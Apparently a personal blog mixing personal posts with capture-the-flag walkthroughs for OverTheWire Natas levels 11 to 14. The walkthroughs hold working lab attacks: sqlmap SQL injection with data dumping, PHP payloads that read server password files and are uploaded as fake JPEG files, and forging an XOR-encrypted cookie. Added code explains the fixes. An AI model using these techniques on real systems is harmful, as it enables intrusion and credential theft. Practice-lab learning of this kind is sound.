Oct 20, 2022

an experiment

hey,

most probably you have already heard that success is nothing more than the result of ongoing hard work and patience. I have heard, read and said this thousands of times, but either my laziness or my lack of patience had never let me see or feel it on my own.

This year in March I received my first iPhone. I used to be "an Android girl", and I was pretty sure that iOS would never be a part of my life. Yet, I'm studying iOS development now. Anyway, after installing all the necessary software on the new phone I installed a game, a really funny one - Fishdom by Playrix. I was kind of hooked on it; I could play for hours until I couldn't feel my fingers. The concept is lovely: you buy fish, you feed them, you design their aquarium, and you play more, and buy more, discover new worlds and new aquariums. Some levels are terribly hard; I could be stuck on the same level for days and go crazy, but I always kept trying and not a single level was unbeatable.

Yesterday, for the first time in these eight months, I came first in the gold league. That meant something to me, so please laugh, but not so loudly.

You know I'm always looking for something between the lines. So here, this game came as proof that if you are devoted, if you keep struggling, if you try hard, one day you'll collect enough marbles and you'll be the first.

I thought it's supposed to be easier...

Oct 11, 2022

go hack yourself

hey there,

so I got this pin (btw sent from Defcon) and I loved it. 

for me hacking is not only about looking for a vulnerability and cracking the system. mostly I see it as the most creative way you can approach a problem: thinking differently, finding the point that was never meant to be found, acting unexpectedly. and what's the point of these actions? at least for me the only goal is improving the security of the system you are about to hack.

I caught myself thinking that all my life I've brought myself to the level of being cracked, to find my own vulnerable side in order to be able to improve it, to make it and myself more secure; I've put myself in situations I'm not ready for at all, just to see how I react. for me that's the only way to self-awareness, of course along with meditation and yoga.

so, maybe you'll see a pun here and a swear word; meanwhile this is not offensive at all (pun intended). it can be understood as a motto about knowing yourself and hacking your mind.

go hack yourself

Mar 29, 2022

OverTheWire – Natas 14

hey you!

I love the Natas people! I'll tell you why a bit later. open the source code. it says: if(mysql_num_rows(mysql_query($query, $link)) > 0) { and many other lines. I didn't even pay attention to those. I got what I needed. MySQL !!!

twenty minutes ago, I had no idea about SQL. I had only heard about it while going through some books about web application pentesting. so my gut told me: "c'mon, go and learn what it is after all". this tutorial was more than enough for this level.

what I did was assume that the username should be natas15 and try to log in. oh, my lovely Burp Suite. intercept is on :) here is what we find:

POST /index.php HTTP/1.1
Host: natas14.natas.labs.overthewire.org
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://natas14.natas.labs.overthewire.org
Authorization: Basic bmF0YXMxNDpMZzk2TTEwVGRmYVB5VkJrSmRqeW1ibGxRNUw2cWRsMQ==
Connection: close
Referer: http://natas14.natas.labs.overthewire.org/
Cookie: __utma=176859643.2101260650.1648221880.1648222577.1648226688.3; __utmz=176859643.1648222577.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided)
Upgrade-Insecure-Requests: 1
username=natas15&password=testpassword

I just copy-pasted this into a new file called natas15. the rest is up to sqlmap; here we type:

sqlmap -r natas15 -p username

and then say "yes" to every question: y, y, y, y... to get more out of it, we add --dump: sqlmap -r natas15 -p username --dump and run again. here comes the sun fun.

don't get disappointed if the username natas15 doesn't work. try the others as well. hey, you obviously know how to use sqlmap. <3
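Here is an added example (mine, not part of the level or this post) of why that one line of source was enough to know what to try: a login check that splices the submitted username into the SQL string, next to the same check written with a placeholder. It uses Python's built-in sqlite3 with a constructed one-row table; the query shape, the table and the credentials are assumptions, not the level's real ones.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed one-row table for the demo (not the level's database)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('natas15', 'sample-password')")
    return conn


def login_concat(conn, username, password):
    """Vulnerable pattern (assumed query shape): the submitted values are
    spliced into the SQL text, so a quote in the input changes the query's
    structure instead of being compared as data."""
    query = ("SELECT * FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return len(conn.execute(query).fetchall()) > 0


def login_param(conn, username, password):
    """Fixed pattern: placeholders hand the values to the driver separately,
    so the input can only ever be compared, never parsed as SQL."""
    rows = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


def compare_logins():
    """Runs both checks with real credentials and with a username that
    carries a quote (the kind of input sqlmap sends automatically)."""
    conn = make_db()
    probe = "natas15' OR '1'='1"
    return {
        "concat_valid": login_concat(conn, "natas15", "sample-password"),
        "concat_probe": login_concat(conn, probe, "wrong"),
        "param_valid": login_param(conn, "natas15", "sample-password"),
        "param_probe": login_param(conn, probe, "wrong"),
    }


if __name__ == "__main__":
    for name, ok in compare_logins().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```

The only difference between the two functions is who parses the quotes: in the first the database does, in the second the driver keeps them inside the value. That is the whole reason mysql_num_rows on a concatenated query is worth a sqlmap run and a parameterised one is not.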

I thought it's supposed to be easier… 

OverTheWire – Natas 13

hey there,

people learn from their mistakes, and so does Natas. they have heard that instead of a .jpg we were able to upload any file, so they made some changes and "improved" their security for this level. have they even heard about magic numbers? today they are gonna do their magic for us.

first just open your terminal and hexdump any .jpg file. I have just found this cutie on my laptop, so let's see how .jpg files differ from the other ones. so, I'm gonna type: xxd nameofthephoto.jpg

pay attention to the first bytes of the hexdump: ffd8 ffe0 00

these are the magic numbers for .jpg, and they are here for us today. we can convince the server that the file we are uploading is a pure .jpg, as it wishes. (ssshhh, don't tell anyone, we are going to upload a wonderful .php that will lead us to our password)

do you remember the script (natas13.php) that we wrote together for the last level? bring it back, we need it today as well. you have to make some changes though:

<?php
// read the next level's password file; no stray space inside the path
echo file_get_contents("/etc/natas_webpass/natas14");
?>

and now let's make a .jpg file just to have the magic numbers in it: 

echo -e "\xff\xd8\xff\xe0\n" > newfile.jpg

we should merge these two files: 

cat natas13.php >> newfile.jpg

the rest is the same. upload the file, change the name to .php (now you like Burp Suite more, right?) and enjoy the moment. come back for the next level.
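As an added example (mine, not the game's code), here is the kind of check this level beats next to a version that would not fall for the trick: a magic-byte test only proves the first few bytes, so the server has to choose the stored name and extension itself and, ideally, check the whole file rather than its head. Function names, the markers and the sample bytes are my assumptions; the size limit is the 1KB from the previous level.

```python
import secrets

JPEG_SOI = b"\xff\xd8\xff"  # the "magic numbers" from the hexdump above
JPEG_EOI = b"\xff\xd9"      # end-of-image marker every real JPEG ends with


def weak_is_jpeg(content: bytes) -> bool:
    """The check this level beats: only the first bytes are inspected."""
    return content.startswith(JPEG_SOI)


def looks_like_jpeg(content: bytes) -> bool:
    """Stricter content check: SOI at the start and EOI at the end. Still a
    heuristic (decoding the image is the proper test), but the script
    appended in this post no longer passes."""
    return content.startswith(JPEG_SOI) and content.endswith(JPEG_EOI)


def stored_name() -> str:
    """The server picks both the basename and the extension. The client's
    filename is never used, so renaming the upload in the proxy changes
    nothing about what lands on disk or how the web server treats it."""
    return secrets.token_hex(8) + ".jpg"


def validate_upload(client_filename: str, content: bytes, max_bytes: int = 1024):
    """Returns (accepted, stored name or reason). client_filename is only
    there for logging; it has no influence on the decision or the name."""
    if len(content) > max_bytes:
        return (False, "too large")
    if not looks_like_jpeg(content):
        return (False, "not a JPEG")
    return (True, stored_name())


# Constructed samples: the post's polyglot (magic bytes + PHP) and a stub
# that at least has the JPEG frame around it.
POLYGLOT = b"\xff\xd8\xff\xe0\n" + b"<?php /* constructed placeholder */ ?>"
FRAMED_STUB = b"\xff\xd8\xff\xe0" + bytes(16) + b"\xff\xd9"

if __name__ == "__main__":
    print("weak check on polyglot:", weak_is_jpeg(POLYGLOT))
    print("hardened check on polyglot:", validate_upload("natas13.php", POLYGLOT))
    print("hardened check on framed stub:", validate_upload("natas13.php", FRAMED_STUB))
```

The content check is the smaller half of the fix. Even if it let a polyglot through, the file would be written as random.jpg, so the rename in Burp Suite would have nothing to act on; that is the control worth keeping even when the header check is improved later.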

I thought it's supposed to be easier…

Mar 28, 2022

OverTheWire – Natas 12

hey there, 

the older we get, the harder life gets. here in OverTheWire it's a bit different: level 12 is much easier if you've already passed the other 11 levels. (good for you, by the way! what a journey, huh?!)

have you already read the script? actually, there is nothing new for us. we can get the same from the page: you should upload a .jpg file not bigger than 1KB. let's try it.

before that, do you have Burp Suite? you're gonna need it. I should confess, at first I hated it. now it's one of my best friends. please, download it and come back...I'll wait. if you have it already, you need to know how it works, right? here I've found a tutorial for you to be quick, but I learned it in about 5 hours with this crazy guy.

I made just a random .txt file and tried to upload it to see what happens when you don't upload the required .jpeg.

have you noticed? it has renamed it to .jpg. let's see if we can change it back to .txt. and click on the uploaded file:

voila! it reads the text file. this is so bad… so bad… this is my friend the File inclusion vulnerability. what if we create a PHP file, because we know that the server supports PHP? no worries, this is going to be easy, you just need one function: file_get_contents, and we already know where the password is, right: /etc/natas_webpass/natas13. it should look like this:

<?php
// print the contents of the password file for the next level
echo file_get_contents("/etc/natas_webpass/natas13");
?>

save the file as natas12.php and upload it. then just go back to your close friend Burp Suite and change the .jpg to .php, click forward. what do you think? what will happen if you open the uploaded file? do it yourself, I trust you! see you on the next level.

I thought it's supposed to be easier...

Mar 27, 2022

OverTheWire – Natas 11

hey there,

so you have already passed all the previous levels? congrats, you are good to go! it's getting a bit complicated from now on. no worries! I'm here to make it easier for you. now we are on level 11, and I hope you have the password.

What do we see here? 

you already know what to do, right? let's see what the source code says:

$defaultdata = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

function xor_encrypt($in) {
    $key = '<censored>';
    $text = $in;
    $outText = '';

    // Iterate through each character
    for($i=0;$i<strlen($text);$i++) {
        $outText .= $text[$i] ^ $key[$i % strlen($key)];
    }

    return $outText;
}

the $defaultdata array contains two values: showpassword and bgcolor. (you do see that "no", don't you? we are gonna change that to "yes")

what is on the next line? xor_encrypt? what new hell is this? let me explain: XOR encryption is like two salads with one shared ingredient – the key. in both cases (encryption and decryption) the key stays the same. if the plain text has the same length as the key, the key is used once; if not, the key is repeated. here I've found a very simple explanation of the concept for you.

now that we know what XOR encryption means, let's go on and look at the rest of the source code.

function loadData($def) {
    global $_COOKIE;
    $mydata = $def;
    if(array_key_exists("data", $_COOKIE)) {
        $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);
        if(is_array($tempdata) && array_key_exists("showpassword", $tempdata) && array_key_exists("bgcolor", $tempdata)) {
            if (preg_match('/^#(?:[a-f\d]{6})$/i', $tempdata['bgcolor'])) {
                $mydata['showpassword'] = $tempdata['showpassword'];
                $mydata['bgcolor'] = $tempdata['bgcolor'];
            }
        }
    }
    return $mydata;
}

what does it say? look at the 5th line. 

$tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE["data"])), true);

hah! Cookie? so we must pay attention to the cookies; there should be something for us.

"Cookies are protected with XOR encryption" says the page. not only that, if you've already paid some attention, $tempdata has played some games: json_decode, xor_encrypt and base64_decode, applied innermost first, so base64_decode is the one that touches the cookie. what we can do is start from the end of that list:

1) base64-decode our favorite line of the cookies (base64 -d)
2) in order to be able to do some xor_encrypt, we need a hexdump, so
3) base64 -d | xxd -p

note: you'll see %3D at the end of the cookie; that is URL encoding, basically it is a =, so replace that part with =.

the result should look like this: 

4) now we have the output of our xor_encrypt, and we need the plain text to be able to find out the key.

here comes some php coding copy-pasting (don't worry if you can't code in php; remember, you just need to understand what's written in there)

just create a php file and type or copy-paste the following. 

<?php

$in = array( "showpassword"=>"no", "bgcolor"=>"#ffffff");

print(json_encode($in));

?>


the output is going to be our input for the XOR encryption. 

{"showpassword":"no","bgcolor":"#ffffff"}


the world is full of encrypting - decrypting websites. here is one

voila! we have our key: qw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jqw8Jq 

if you remember, I have already told you that in case the key is short, it is repeated. so the exact key is: qw8J

our crazy mind says: go and copy some other code out there. 

go back to your php file and do some edits. I had told you we were gonna make the "no" into a very nice "yes". then run the new JSON through xor_encrypt with the key qw8J and base64-encode the result: exactly the reverse of what loadData does to the cookie.

execute the file, and you will see a whole other cookie there:

ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK


what is required is to replace the previous one with this new, much better one. and please, don't forget to add %3D at the end. the rest is on you! enjoy the moment of seeing the password on your screen. you deserve it! 
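Here is the whole cookie round trip as an added Python example (mine, not the level's PHP): the same repeating-key XOR, the known-plaintext key recovery that the encrypt/decrypt website did for us, and a check that the cookie printed above really comes out of the key qw8J. It also shows the fix a server would use instead, an HMAC tag over the cookie, under an assumed secret; sign_cookie, verify_cookie and swap_payload are my names, not anything from the level.

```python
import base64
import hashlib
import hmac
import json


def xor_encrypt(data: bytes, key: bytes) -> bytes:
    """Same operation as the level's PHP xor_encrypt(): the key repeats."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def php_json(obj: dict) -> bytes:
    """PHP's json_encode writes no spaces; Python's default does, so match it."""
    return json.dumps(obj, separators=(",", ":")).encode()


def make_cookie(data: dict, key: bytes) -> str:
    """The reverse of loadData(): base64(xor_encrypt(json_encode(data)))."""
    return base64.b64encode(xor_encrypt(php_json(data), key)).decode()


def recover_key(known_plaintext: dict, cookie: str) -> bytes:
    """Known-plaintext recovery: ciphertext XOR plaintext is the key stream,
    and the shortest block that repeats through it is the key itself."""
    stream = bytes(c ^ p for c, p in zip(base64.b64decode(cookie), php_json(known_plaintext)))
    for period in range(1, len(stream) + 1):
        if all(stream[i] == stream[i % period] for i in range(len(stream))):
            return stream[:period]
    return stream


# ---- what a fixed server would do instead: authenticate, don't obscure ----

def sign_cookie(data: dict, secret: bytes) -> str:
    """payload.tag: the data stays readable, but an HMAC over it means any
    edit is detected. Unlike the XOR key, the secret never combines with a
    known plaintext in a way that lets the client peel it off the cookie."""
    payload = base64.urlsafe_b64encode(php_json(data)).decode()
    tag = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + tag


def verify_cookie(cookie: str, secret: bytes):
    """Returns the data if the tag matches, None if anything was changed."""
    payload, _, tag = cookie.rpartition(".")
    expected = hmac.new(secret, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))


def swap_payload(signed_cookie: str, new_data: dict) -> str:
    """The natas11 edit tried against a signed cookie: new payload, old tag."""
    return base64.urlsafe_b64encode(php_json(new_data)).decode() + "." + signed_cookie.rpartition(".")[2]


DEFAULT = {"showpassword": "no", "bgcolor": "#ffffff"}
WANTED = {"showpassword": "yes", "bgcolor": "#ffffff"}
PAGE_COOKIE = "ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK"  # from the post above

if __name__ == "__main__":
    key = recover_key(WANTED, PAGE_COOKIE)
    print("key recovered from the post's cookie:", key)
    print("rebuilt cookie matches the post:", make_cookie(WANTED, key) == PAGE_COOKIE)
    secret = b"constructed-server-secret"  # assumption: held only by the server
    signed = sign_cookie(DEFAULT, secret)
    print("signed cookie verifies:", verify_cookie(signed, secret) == DEFAULT)
    print("edited payload verifies:", verify_cookie(swap_payload(signed, WANTED), secret))
```

The level is beatable because the cookie's plaintext is known (it is the default array in the source) and XOR with a repeating key hands the key to anyone who has one plaintext/ciphertext pair. Notice that recover_key only needs the cookie for the default "no" page, the same thing every visitor gets. The HMAC version leaks nothing useful to that visitor: the payload is plain JSON on purpose, and the tag, not secrecy, is what stops the "no" from becoming "yes".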

I thought it's supposed to be easier...

Mar 26, 2022

intro(2) why

hey there, 

I had been thinking about having an English blog for like a year (or more…whatever). the gods of Olympia had foreseen that it should be opened on a cold spring day somewhere in 2022. who am I not to follow their predictions?

so it's already 5 am, but we are still sitting at Antranig's office working and listening to some good music which keeps us awake.

meanwhile, I'm trying to solve some levels from Natas, and (what a surprise!) it doesn't seem to be child's play. being a complete beginner in the field, I needed some hints, at least. Hackmethod has already posted a few blogs with hints and everything, but unfortunately they gave up after level 10, so right after that you choose: either look for other blogs and find too many spoilers, or DIY. spoilers and already written passwords are not acceptable for me; I'm doing this for learning and I require explanations for the steps. there is nothing left but to do it myself (this means I'm just gonna ask for some help from the Discord community) and blog about every level (of course without spoilers, just brief tips).

so, my word for the coming generations: “follow my future blogs, because I'm going to post some hints for each level in case you have difficulties… and before I forget, stay hydrated”.

I thought it's supposed to be easier...